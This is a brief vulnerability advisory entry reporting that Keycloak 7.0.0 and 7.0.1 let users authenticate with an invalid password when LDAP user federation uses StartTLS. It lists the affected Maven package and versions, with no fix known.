A vulnerability was found in keycloak 7.x, when keycloak is configured with LDAP user federation and StartTLS is used instead of SSL/TLS from the LDAP server (ldaps), in this case user authentication succeeds even if invalid password has entered.
References:GSA_kwCzR0hTQS1qZjg2LTk0MzQtZjhjMs4AAi3L
Keycloak Authentication Error
Affected Packages | Affected Versions | Fixed Versions | |
---|---|---|---|
maven:org.keycloak:keycloak-parent | >= 7.0.0, <= 7.0.1 | No known fixed version | |
Affected Version RangesAll affected versions7.0.0, 7.0.1 |